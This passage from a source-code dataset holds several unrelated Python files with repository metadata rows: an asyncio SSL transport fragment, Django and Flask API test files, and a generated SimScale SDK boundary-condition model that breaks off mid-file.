            # b'' is the sentinel that makes _process_write_backlog()
            # perform the shutdown rather than send data.
            self._write_appdata(b'')

    def _write_appdata(self, data):
        # Queue plaintext for encryption; (data, 0) = start at offset 0.
        self._write_backlog.append((data, 0))
        self._write_buffer_size += len(data)
        self._process_write_backlog()

    def _start_handshake(self):
        if self._loop.get_debug():
            logger.debug("%r starts SSL handshake", self)
            self._handshake_start_time = self._loop.time()
        else:
            self._handshake_start_time = None
        self._in_handshake = True
        # (b'', 1) is a special value in _process_write_backlog() to do
        # the SSL handshake
        self._write_backlog.append((b'', 1))
        # Abort the connection if the handshake doesn't finish in time.
        self._handshake_timeout_handle = \
            self._loop.call_later(self._ssl_handshake_timeout,
                                  self._check_handshake_timeout)
        self._process_write_backlog()

    def _check_handshake_timeout(self):
        if self._in_handshake is True:
            msg = (
                f"SSL handshake is taking longer than "
                f"{self._ssl_handshake_timeout} seconds: "
                f"aborting the connection"
            )
            self._fatal_error(ConnectionAbortedError(msg))

    def _on_handshake_complete(self, handshake_exc):
        # Callback invoked by the _SSLPipe once the handshake finished
        # (handshake_exc is None) or failed (handshake_exc is the error).
        self._in_handshake = False
        self._handshake_timeout_handle.cancel()
        sslobj = self._sslpipe.ssl_object
        try:
            if handshake_exc is not None:
                raise handshake_exc
            peercert = sslobj.getpeercert()
        except Exception as exc:
            if isinstance(exc, ssl.CertificateError):
                msg = 'SSL handshake failed on verifying the certificate'
            else:
                msg = 'SSL handshake failed'
            self._fatal_error(exc, msg)
            return
        if self._loop.get_debug():
            dt = self._loop.time() - self._handshake_start_time
            logger.debug("%r: SSL handshake took %.1f ms", self, dt * 1e3)
        # Add extra info that becomes available after handshake.
        self._extra.update(peercert=peercert,
                           cipher=sslobj.cipher(),
                           compression=sslobj.compression(),
                           ssl_object=sslobj,
                           )
        if self._call_connection_made:
            self._app_protocol.connection_made(self._app_transport)
        self._wakeup_waiter()
        self._session_established = True
        # In case transport.write() was already called. Don't call
        # immediately _process_write_backlog(), but schedule it:
        # _on_handshake_complete() can be called indirectly from
        # _process_write_backlog(), and _process_write_backlog() is not
        # reentrant.
        self._loop.call_soon(self._process_write_backlog)

    def _process_write_backlog(self):
        # Try to make progress on the write backlog.
        if self._transport is None or self._sslpipe is None:
            return
        try:
            for i in range(len(self._write_backlog)):
                data, offset = self._write_backlog[0]
                if data:
                    # Regular application data: encrypt from *offset* on.
                    ssldata, offset = self._sslpipe.feed_appdata(data, offset)
                elif offset:
                    # (b'', 1) sentinel: drive the handshake.
                    ssldata = self._sslpipe.do_handshake(
                        self._on_handshake_complete)
                    offset = 1
                else:
                    # (b'', 0) sentinel: drive the shutdown.
                    ssldata = self._sslpipe.shutdown(self._finalize)
                    offset = 1
                for chunk in ssldata:
                    self._transport.write(chunk)
                if offset < len(data):
                    self._write_backlog[0] = (data, offset)
                    # A short write means that a write is blocked on a read
                    # We need to enable reading if it is paused!
                    assert self._sslpipe.need_ssldata
                    if self._transport._paused:
                        self._transport.resume_reading()
                    break
                # An entire chunk from the backlog was processed. We can
                # delete it and reduce the outstanding buffer size.
                del self._write_backlog[0]
                self._write_buffer_size -= len(data)
        except Exception as exc:
            if self._in_handshake:
                # Exceptions will be re-raised in _on_handshake_complete.
                self._on_handshake_complete(exc)
            else:
                self._fatal_error(exc, 'Fatal error on SSL transport')

    def _fatal_error(self, exc, message='Fatal error on transport'):
        # Report an unrecoverable error and force-close the raw transport.
        if isinstance(exc, base_events._FATAL_ERROR_IGNORE):
            if self._loop.get_debug():
                logger.debug("%r: %s", self, message, exc_info=True)
        else:
            self._loop.call_exception_handler({
                'message': message,
                'exception': exc,
                'transport': self._transport,
                'protocol': self,
            })
        if self._transport:
            self._transport._force_close(exc)

    def _finalize(self):
        # Called once the TLS shutdown completed: drop the pipe and close
        # the underlying transport.
        self._sslpipe = None
        if self._transport is not None:
            self._transport.close()

    def _abort(self):
        # Hard-close the connection; _finalize() always runs for cleanup.
        try:
            if self._transport is not None:
                self._transport.abort()
        finally:
            self._finalize()
| 37.020604 | 79 | 0.605655 |
9ef5d4d677a7cf87dc6f0834054c7817f861e9d1 | 4,380 | py | Python | app/recipe/tests/tests_ingredient_api.py | momchilantonov/recipe_app_api | 5fe15fa184f464a677f65d45d33d8241c627b432 | [
"MIT"
] | null | null | null | app/recipe/tests/tests_ingredient_api.py | momchilantonov/recipe_app_api | 5fe15fa184f464a677f65d45d33d8241c627b432 | [
"MIT"
] | null | null | null | app/recipe/tests/tests_ingredient_api.py | momchilantonov/recipe_app_api | 5fe15fa184f464a677f65d45d33d8241c627b432 | [
"MIT"
] | null | null | null | from django.contrib.auth import get_user_model
from django.urls import reverse
from django.test import TestCase
from rest_framework import status
from rest_framework.test import APIClient
from core.models import Ingredient, Recipe
from recipe.serializers import IngredientSerializer
INGREDIENTS_URL = reverse('recipe:ingredient-list')
class PublicIngredientsApiTests(TestCase):
    """Tests for the ingredients API when no user is authenticated."""

    def setUp(self):
        """Create a fresh, unauthenticated API client for every test."""
        self.client = APIClient()

    def test_loggin_required(self):
        """The ingredients endpoint must reject anonymous requests."""
        response = self.client.get(INGREDIENTS_URL)
        self.assertEqual(response.status_code, status.HTTP_401_UNAUTHORIZED)
class PrivetIngredientsApiTests(TestCase):
    """Tests for the ingredients API as an authenticated user."""

    def setUp(self):
        """Create a user and an API client authenticated as that user."""
        self.client = APIClient()
        self.user = get_user_model().objects.create_user(
            email='user@user.com',
            password='userPass'
        )
        self.client.force_authenticate(self.user)

    def test_retrieve_ingredients_list(self):
        """Test retrieving a list of ingredients."""
        Ingredient.objects.create(user=self.user, name='Kale')
        Ingredient.objects.create(user=self.user, name='Salt')
        res = self.client.get(INGREDIENTS_URL)
        ingredients = Ingredient.objects.all().order_by('-name')
        serializer = IngredientSerializer(ingredients, many=True)
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertEqual(res.data, serializer.data)

    def test_ingredients_limited_to_user(self):
        """Test that only the authenticated user's ingredients are returned.

        BUG FIX: the method previously lacked the ``test_`` prefix, so the
        test runner silently skipped it and its assertions never ran.
        """
        user2 = get_user_model().objects.create_user(
            email='user2@user2.com',
            password='user2Pass'
        )
        Ingredient.objects.create(user=user2, name='Vinegar')
        ingredient = Ingredient.objects.create(user=self.user, name='Tumeric')
        res = self.client.get(INGREDIENTS_URL)
        self.assertEqual(res.status_code, status.HTTP_200_OK)
        self.assertEqual(len(res.data), 1)
        # BUG FIX: was ``res.date[0]`` (AttributeError); must be ``res.data``.
        self.assertEqual(res.data[0]['name'], ingredient.name)

    def test_create_ingredient_successful(self):
        """Test creating a new ingredient succeeds."""
        payload = {'name': 'Cabbage'}
        self.client.post(INGREDIENTS_URL, payload)
        exist = Ingredient.objects.filter(
            user=self.user,
            name=payload['name']
        ).exists()
        self.assertTrue(exist)

    def test_create_ingredient_invalid(self):
        """Test creating an ingredient with an empty name fails."""
        payload = {'name': ''}
        res = self.client.post(INGREDIENTS_URL, payload)
        self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)

    def test_retrieve_ingredients_assigned_to_recipes(self):
        """Test filtering ingredients by those assigned to recipes."""
        ingredient1 = Ingredient.objects.create(user=self.user, name='Eggs')
        ingredient2 = Ingredient.objects.create(user=self.user, name='Milk')
        recipe = Recipe.objects.create(
            title='Eggs with Milk',
            time_minutes=8,
            price=6.00,
            user=self.user
        )
        recipe.ingredients.add(ingredient1)
        res = self.client.get(INGREDIENTS_URL, {'assigned_only': 1})
        serializer1 = IngredientSerializer(ingredient1)
        serializer2 = IngredientSerializer(ingredient2)
        # Only the assigned ingredient should appear in the response.
        self.assertIn(serializer1.data, res.data)
        self.assertNotIn(serializer2.data, res.data)

    def test_retrieve_ingredients_assigned_unique(self):
        """Test filtering ingredients by assigned returns unique items."""
        ingredient = Ingredient.objects.create(user=self.user, name='Eggs')
        Ingredient.objects.create(user=self.user, name='Milk')
        recipe1 = Recipe.objects.create(
            title='Eggs with Milk',
            time_minutes=8,
            price=6.00,
            user=self.user
        )
        recipe1.ingredients.add(ingredient)
        recipe2 = Recipe.objects.create(
            title='Porridge',
            time_minutes=3,
            price=5.00,
            user=self.user
        )
        recipe2.ingredients.add(ingredient)
        res = self.client.get(INGREDIENTS_URL, {'assigned_only': 1})
        # The ingredient is on two recipes but must be listed only once.
        self.assertEqual(len(res.data), 1)
| 36.806723 | 78 | 0.66484 |
32194989518a3401f14cf907b8beb81db996805c | 1,346 | py | Python | app-test.py | webbyfox/suade | 52a93df0f4cb1f6442b6c7dd259c8350a7687082 | [
"MIT"
] | null | null | null | app-test.py | webbyfox/suade | 52a93df0f4cb1f6442b6c7dd259c8350a7687082 | [
"MIT"
] | null | null | null | app-test.py | webbyfox/suade | 52a93df0f4cb1f6442b6c7dd259c8350a7687082 | [
"MIT"
] | null | null | null | from app import app
import unittest
class BasicTestCase(unittest.TestCase):
    """Smoke tests for the Suade reporting Flask application."""

    def _get(self, path):
        # Helper: issue a GET request against a fresh test client.
        return app.test_client(self).get(path, content_type='html/text')

    def test_index(self):
        """The root URL responds 200 with the welcome banner."""
        response = self._get('/')
        self.assertEqual(response.status_code, 200)
        self.assertEqual(response.data, b'Welcome to Suade Reporting API!')

    def test_reports(self):
        """The report listing endpoint responds 200."""
        response = self._get('/api/reports/')
        self.assertEqual(response.status_code, 200)
        # self.assertEqual(response.data, b'Welcome to Suade Reporting API!')

    def test_xml_report(self):
        """A single report can be fetched in XML format."""
        response = self._get('/api/report/1.xml/')
        self.assertIsNotNone(response)
        self.assertEqual(response.status_code, 200)

    def test_pdf_report(self):
        """A single report can be fetched in PDF format."""
        response = self._get('/api/report/1.pdf/')
        self.assertIsNotNone(response)
        self.assertEqual(response.status_code, 200)

    def test_dummy_url(self):
        """An unknown report URL yields a 404."""
        response = self._get('/api/report/xyz')
        self.assertEqual(response.status_code, 404)
if __name__ == '__main__':
    # Run the test suite when this file is executed directly.
    unittest.main()
2293aae1c740cfcd9eee5978496fad92d91ae67b | 30,196 | py | Python | simscale_sdk/models/one_of_convective_heat_transfer_boundary_conditions.py | slainesimscale/simscale-python-sdk | db483eeabe558e55d020f5f829a3bf13c9c287a7 | [
"MIT"
] | null | null | null | simscale_sdk/models/one_of_convective_heat_transfer_boundary_conditions.py | slainesimscale/simscale-python-sdk | db483eeabe558e55d020f5f829a3bf13c9c287a7 | [
"MIT"
] | null | null | null | simscale_sdk/models/one_of_convective_heat_transfer_boundary_conditions.py | slainesimscale/simscale-python-sdk | db483eeabe558e55d020f5f829a3bf13c9c287a7 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
SimScale API
The version of the OpenAPI document: 0.0.0
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
from simscale_sdk.configuration import Configuration
class OneOfConvectiveHeatTransferBoundaryConditions(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
openapi_types = {
'type': 'str',
'name': 'str',
'velocity': 'OneOfCustomFluidBCVelocity',
'temperature': 'AmbientTBC',
'passive_scalars': 'list[OneOfCustomFluidBCPassiveScalars]',
'phase_fraction': 'OneOfCustomFluidBCPhaseFraction',
'turbulence_intensity': 'OneOfVelocityInletBCTurbulenceIntensity',
'dissipation_type': 'OneOfVelocityInletBCDissipationType',
'net_radiative_heat_flux': 'OneOfNaturalConvectionInletOutletBCNetRadiativeHeatFlux',
'radiative_intensity_ray': 'OpenBoundaryRayBC',
'topological_reference': 'TopologicalReference',
'pressure': 'OneOfCustomFluidBCPressure',
'pressure_rgh': 'AmbientPBC',
'gauge_pressure': 'OneOfCustomFluidBCGaugePressure',
'gauge_pressure_rgh': 'OneOfCustomFluidBCGaugePressureRgh',
'turbulent_kinetic_energy': 'OneOfCustomFluidBCTurbulentKineticEnergy',
'omega_dissipation_rate': 'OneOfCustomFluidBCOmegaDissipationRate',
'epsilon_dissipation_rate': 'OneOfCustomFluidBCEpsilonDissipationRate',
'eddy_viscosity': 'OneOfCustomFluidBCEddyViscosity',
'eddy_viscosity_compressible': 'OneOfCustomFluidBCEddyViscosityCompressible',
'nu_tilda': 'OneOfCustomFluidBCNuTilda',
'turbulent_thermal_diffusivity': 'OneOfCustomFluidBCTurbulentThermalDiffusivity',
'turbulent_thermal_diffusivity_compressible': 'OneOfCustomFluidBCTurbulentThermalDiffusivityCompressible',
'turbulent_dynamic_viscosity': 'OneOfCustomFluidBCTurbulentDynamicViscosity'
}
attribute_map = {
'type': 'type',
'name': 'name',
'velocity': 'velocity',
'temperature': 'temperature',
'passive_scalars': 'passiveScalars',
'phase_fraction': 'phaseFraction',
'turbulence_intensity': 'turbulenceIntensity',
'dissipation_type': 'dissipationType',
'net_radiative_heat_flux': 'netRadiativeHeatFlux',
'radiative_intensity_ray': 'radiativeIntensityRay',
'topological_reference': 'topologicalReference',
'pressure': 'pressure',
'pressure_rgh': 'pressureRgh',
'gauge_pressure': 'gaugePressure',
'gauge_pressure_rgh': 'gaugePressureRgh',
'turbulent_kinetic_energy': 'turbulentKineticEnergy',
'omega_dissipation_rate': 'omegaDissipationRate',
'epsilon_dissipation_rate': 'epsilonDissipationRate',
'eddy_viscosity': 'eddyViscosity',
'eddy_viscosity_compressible': 'eddyViscosityCompressible',
'nu_tilda': 'nuTilda',
'turbulent_thermal_diffusivity': 'turbulentThermalDiffusivity',
'turbulent_thermal_diffusivity_compressible': 'turbulentThermalDiffusivityCompressible',
'turbulent_dynamic_viscosity': 'turbulentDynamicViscosity'
}
discriminator_value_class_map = {
'VELOCITY_INLET_V3': 'VelocityInletBC',
'VELOCITY_OUTLET_V7': 'VelocityOutletBC',
'PRESSURE_INLET_V31': 'PressureInletBC',
'PRESSURE_OUTLET_V30': 'PressureOutletBC',
'WALL_V34': 'WallBC',
'SYMMETRY': 'SymmetryBC',
'PERIODIC': 'PeriodicBC',
'WEDGE': 'WedgeBC',
'CUSTOM_V37': 'CustomFluidBC',
'EMPTY_2D': 'Empty2DBC',
'NATURAL_CONVECTION_INLET_OUTLET': 'NaturalConvectionInletOutletBC'
}
def __init__(self, type='NATURAL_CONVECTION_INLET_OUTLET', name=None, velocity=None, temperature=None, passive_scalars=None, phase_fraction=None, turbulence_intensity=None, dissipation_type=None, net_radiative_heat_flux=None, radiative_intensity_ray=None, topological_reference=None, pressure=None, pressure_rgh=None, gauge_pressure=None, gauge_pressure_rgh=None, turbulent_kinetic_energy=None, omega_dissipation_rate=None, epsilon_dissipation_rate=None, eddy_viscosity=None, eddy_viscosity_compressible=None, nu_tilda=None, turbulent_thermal_diffusivity=None, turbulent_thermal_diffusivity_compressible=None, turbulent_dynamic_viscosity=None, local_vars_configuration=None): # noqa: E501
"""OneOfConvectiveHeatTransferBoundaryConditions - a model defined in OpenAPI""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration()
self.local_vars_configuration = local_vars_configuration
self._type = None
self._name = None
self._velocity = None
self._temperature = None
self._passive_scalars = None
self._phase_fraction = None
self._turbulence_intensity = None
self._dissipation_type = None
self._net_radiative_heat_flux = None
self._radiative_intensity_ray = None
self._topological_reference = None
self._pressure = None
self._pressure_rgh = None
self._gauge_pressure = None
self._gauge_pressure_rgh = None
self._turbulent_kinetic_energy = None
self._omega_dissipation_rate = None
self._epsilon_dissipation_rate = None
self._eddy_viscosity = None
self._eddy_viscosity_compressible = None
self._nu_tilda = None
self._turbulent_thermal_diffusivity = None
self._turbulent_thermal_diffusivity_compressible = None
self._turbulent_dynamic_viscosity = None
self.discriminator = 'type'
self.type = type
if name is not None:
self.name = name
if velocity is not None:
self.velocity = velocity
if temperature is not None:
self.temperature = temperature
if passive_scalars is not None:
self.passive_scalars = passive_scalars
if phase_fraction is not None:
self.phase_fraction = phase_fraction
if turbulence_intensity is not None:
self.turbulence_intensity = turbulence_intensity
if dissipation_type is not None:
self.dissipation_type = dissipation_type
if net_radiative_heat_flux is not None:
self.net_radiative_heat_flux = net_radiative_heat_flux
if radiative_intensity_ray is not None:
self.radiative_intensity_ray = radiative_intensity_ray
if topological_reference is not None:
self.topological_reference = topological_reference
if pressure is not None:
self.pressure = pressure
if pressure_rgh is not None:
self.pressure_rgh = pressure_rgh
if gauge_pressure is not None:
self.gauge_pressure = gauge_pressure
if gauge_pressure_rgh is not None:
self.gauge_pressure_rgh = gauge_pressure_rgh
if turbulent_kinetic_energy is not None:
self.turbulent_kinetic_energy = turbulent_kinetic_energy
if omega_dissipation_rate is not None:
self.omega_dissipation_rate = omega_dissipation_rate
if epsilon_dissipation_rate is not None:
self.epsilon_dissipation_rate = epsilon_dissipation_rate
if eddy_viscosity is not None:
self.eddy_viscosity = eddy_viscosity
if eddy_viscosity_compressible is not None:
self.eddy_viscosity_compressible = eddy_viscosity_compressible
if nu_tilda is not None:
self.nu_tilda = nu_tilda
if turbulent_thermal_diffusivity is not None:
self.turbulent_thermal_diffusivity = turbulent_thermal_diffusivity
if turbulent_thermal_diffusivity_compressible is not None:
self.turbulent_thermal_diffusivity_compressible = turbulent_thermal_diffusivity_compressible
if turbulent_dynamic_viscosity is not None:
self.turbulent_dynamic_viscosity = turbulent_dynamic_viscosity
@property
def type(self):
"""Gets the type of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
<p>This boundary condition is suitable for an <b>open boundary</b> where the air can enter or exit freely from or to the <b>atmosphere<b>. <a href='https://www.simscale.com/docs/simulation-setup/boundary-conditions/natural-convection-inlet-outlet/' target='_blank'>Learn more</a>.</P> Schema name: NaturalConvectionInletOutletBC # noqa: E501
:return: The type of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: str
"""
return self._type
@type.setter
def type(self, type):
"""Sets the type of this OneOfConvectiveHeatTransferBoundaryConditions.
<p>This boundary condition is suitable for an <b>open boundary</b> where the air can enter or exit freely from or to the <b>atmosphere<b>. <a href='https://www.simscale.com/docs/simulation-setup/boundary-conditions/natural-convection-inlet-outlet/' target='_blank'>Learn more</a>.</P> Schema name: NaturalConvectionInletOutletBC # noqa: E501
:param type: The type of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: str
"""
if self.local_vars_configuration.client_side_validation and type is None: # noqa: E501
raise ValueError("Invalid value for `type`, must not be `None`") # noqa: E501
self._type = type
@property
def name(self):
"""Gets the name of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The name of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this OneOfConvectiveHeatTransferBoundaryConditions.
:param name: The name of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: str
"""
self._name = name
@property
def velocity(self):
"""Gets the velocity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The velocity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: OneOfCustomFluidBCVelocity
"""
return self._velocity
@velocity.setter
def velocity(self, velocity):
"""Sets the velocity of this OneOfConvectiveHeatTransferBoundaryConditions.
:param velocity: The velocity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: OneOfCustomFluidBCVelocity
"""
self._velocity = velocity
@property
def temperature(self):
"""Gets the temperature of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The temperature of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: AmbientTBC
"""
return self._temperature
@temperature.setter
def temperature(self, temperature):
"""Sets the temperature of this OneOfConvectiveHeatTransferBoundaryConditions.
:param temperature: The temperature of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: AmbientTBC
"""
self._temperature = temperature
@property
def passive_scalars(self):
"""Gets the passive_scalars of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
Please choose a boundary condition for passive scalar (T). # noqa: E501
:return: The passive_scalars of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: list[OneOfCustomFluidBCPassiveScalars]
"""
return self._passive_scalars
@passive_scalars.setter
def passive_scalars(self, passive_scalars):
"""Sets the passive_scalars of this OneOfConvectiveHeatTransferBoundaryConditions.
Please choose a boundary condition for passive scalar (T). # noqa: E501
:param passive_scalars: The passive_scalars of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: list[OneOfCustomFluidBCPassiveScalars]
"""
self._passive_scalars = passive_scalars
@property
def phase_fraction(self):
"""Gets the phase_fraction of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The phase_fraction of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: OneOfCustomFluidBCPhaseFraction
"""
return self._phase_fraction
@phase_fraction.setter
def phase_fraction(self, phase_fraction):
"""Sets the phase_fraction of this OneOfConvectiveHeatTransferBoundaryConditions.
:param phase_fraction: The phase_fraction of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: OneOfCustomFluidBCPhaseFraction
"""
self._phase_fraction = phase_fraction
@property
def turbulence_intensity(self):
"""Gets the turbulence_intensity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The turbulence_intensity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: OneOfVelocityInletBCTurbulenceIntensity
"""
return self._turbulence_intensity
@turbulence_intensity.setter
def turbulence_intensity(self, turbulence_intensity):
"""Sets the turbulence_intensity of this OneOfConvectiveHeatTransferBoundaryConditions.
:param turbulence_intensity: The turbulence_intensity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: OneOfVelocityInletBCTurbulenceIntensity
"""
self._turbulence_intensity = turbulence_intensity
@property
def dissipation_type(self):
"""Gets the dissipation_type of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:return: The dissipation_type of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:rtype: OneOfVelocityInletBCDissipationType
"""
return self._dissipation_type
@dissipation_type.setter
def dissipation_type(self, dissipation_type):
"""Sets the dissipation_type of this OneOfConvectiveHeatTransferBoundaryConditions.
:param dissipation_type: The dissipation_type of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
:type: OneOfVelocityInletBCDissipationType
"""
self._dissipation_type = dissipation_type
    # Generated OpenAPI pass-through accessors: each property mirrors a private
    # attribute verbatim; setters store the value without validation.
    @property
    def net_radiative_heat_flux(self):
        """Gets the net_radiative_heat_flux of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :return: The net_radiative_heat_flux of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :rtype: OneOfNaturalConvectionInletOutletBCNetRadiativeHeatFlux
        """
        return self._net_radiative_heat_flux
    @net_radiative_heat_flux.setter
    def net_radiative_heat_flux(self, net_radiative_heat_flux):
        """Sets the net_radiative_heat_flux of this OneOfConvectiveHeatTransferBoundaryConditions.
        :param net_radiative_heat_flux: The net_radiative_heat_flux of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :type: OneOfNaturalConvectionInletOutletBCNetRadiativeHeatFlux
        """
        self._net_radiative_heat_flux = net_radiative_heat_flux
    # Accessor pair for radiative_intensity_ray (stored unmodified).
    @property
    def radiative_intensity_ray(self):
        """Gets the radiative_intensity_ray of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :return: The radiative_intensity_ray of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :rtype: OpenBoundaryRayBC
        """
        return self._radiative_intensity_ray
    @radiative_intensity_ray.setter
    def radiative_intensity_ray(self, radiative_intensity_ray):
        """Sets the radiative_intensity_ray of this OneOfConvectiveHeatTransferBoundaryConditions.
        :param radiative_intensity_ray: The radiative_intensity_ray of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :type: OpenBoundaryRayBC
        """
        self._radiative_intensity_ray = radiative_intensity_ray
    # Accessor pair for topological_reference (stored unmodified).
    @property
    def topological_reference(self):
        """Gets the topological_reference of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :return: The topological_reference of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :rtype: TopologicalReference
        """
        return self._topological_reference
    @topological_reference.setter
    def topological_reference(self, topological_reference):
        """Sets the topological_reference of this OneOfConvectiveHeatTransferBoundaryConditions.
        :param topological_reference: The topological_reference of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :type: TopologicalReference
        """
        self._topological_reference = topological_reference
    # Generated accessors for the pressure-related model fields; values are
    # stored verbatim with no validation.
    @property
    def pressure(self):
        """Gets the pressure of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :return: The pressure of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :rtype: OneOfCustomFluidBCPressure
        """
        return self._pressure
    @pressure.setter
    def pressure(self, pressure):
        """Sets the pressure of this OneOfConvectiveHeatTransferBoundaryConditions.
        :param pressure: The pressure of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :type: OneOfCustomFluidBCPressure
        """
        self._pressure = pressure
    @property
    def pressure_rgh(self):
        """Gets the pressure_rgh of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :return: The pressure_rgh of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :rtype: AmbientPBC
        """
        return self._pressure_rgh
    @pressure_rgh.setter
    def pressure_rgh(self, pressure_rgh):
        """Sets the pressure_rgh of this OneOfConvectiveHeatTransferBoundaryConditions.
        :param pressure_rgh: The pressure_rgh of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :type: AmbientPBC
        """
        self._pressure_rgh = pressure_rgh
    @property
    def gauge_pressure(self):
        """Gets the gauge_pressure of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :return: The gauge_pressure of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :rtype: OneOfCustomFluidBCGaugePressure
        """
        return self._gauge_pressure
    @gauge_pressure.setter
    def gauge_pressure(self, gauge_pressure):
        """Sets the gauge_pressure of this OneOfConvectiveHeatTransferBoundaryConditions.
        :param gauge_pressure: The gauge_pressure of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :type: OneOfCustomFluidBCGaugePressure
        """
        self._gauge_pressure = gauge_pressure
    @property
    def gauge_pressure_rgh(self):
        """Gets the gauge_pressure_rgh of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :return: The gauge_pressure_rgh of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :rtype: OneOfCustomFluidBCGaugePressureRgh
        """
        return self._gauge_pressure_rgh
    @gauge_pressure_rgh.setter
    def gauge_pressure_rgh(self, gauge_pressure_rgh):
        """Sets the gauge_pressure_rgh of this OneOfConvectiveHeatTransferBoundaryConditions.
        :param gauge_pressure_rgh: The gauge_pressure_rgh of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :type: OneOfCustomFluidBCGaugePressureRgh
        """
        self._gauge_pressure_rgh = gauge_pressure_rgh
    # Generated accessors for the turbulence-quantity model fields; values are
    # stored verbatim with no validation.
    @property
    def turbulent_kinetic_energy(self):
        """Gets the turbulent_kinetic_energy of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :return: The turbulent_kinetic_energy of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :rtype: OneOfCustomFluidBCTurbulentKineticEnergy
        """
        return self._turbulent_kinetic_energy
    @turbulent_kinetic_energy.setter
    def turbulent_kinetic_energy(self, turbulent_kinetic_energy):
        """Sets the turbulent_kinetic_energy of this OneOfConvectiveHeatTransferBoundaryConditions.
        :param turbulent_kinetic_energy: The turbulent_kinetic_energy of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :type: OneOfCustomFluidBCTurbulentKineticEnergy
        """
        self._turbulent_kinetic_energy = turbulent_kinetic_energy
    @property
    def omega_dissipation_rate(self):
        """Gets the omega_dissipation_rate of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :return: The omega_dissipation_rate of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :rtype: OneOfCustomFluidBCOmegaDissipationRate
        """
        return self._omega_dissipation_rate
    @omega_dissipation_rate.setter
    def omega_dissipation_rate(self, omega_dissipation_rate):
        """Sets the omega_dissipation_rate of this OneOfConvectiveHeatTransferBoundaryConditions.
        :param omega_dissipation_rate: The omega_dissipation_rate of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :type: OneOfCustomFluidBCOmegaDissipationRate
        """
        self._omega_dissipation_rate = omega_dissipation_rate
    @property
    def epsilon_dissipation_rate(self):
        """Gets the epsilon_dissipation_rate of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :return: The epsilon_dissipation_rate of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :rtype: OneOfCustomFluidBCEpsilonDissipationRate
        """
        return self._epsilon_dissipation_rate
    @epsilon_dissipation_rate.setter
    def epsilon_dissipation_rate(self, epsilon_dissipation_rate):
        """Sets the epsilon_dissipation_rate of this OneOfConvectiveHeatTransferBoundaryConditions.
        :param epsilon_dissipation_rate: The epsilon_dissipation_rate of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :type: OneOfCustomFluidBCEpsilonDissipationRate
        """
        self._epsilon_dissipation_rate = epsilon_dissipation_rate
    @property
    def eddy_viscosity(self):
        """Gets the eddy_viscosity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
        :return: The eddy_viscosity of this OneOfConvectiveHeatTransferBoundaryConditions. # noqa: E501
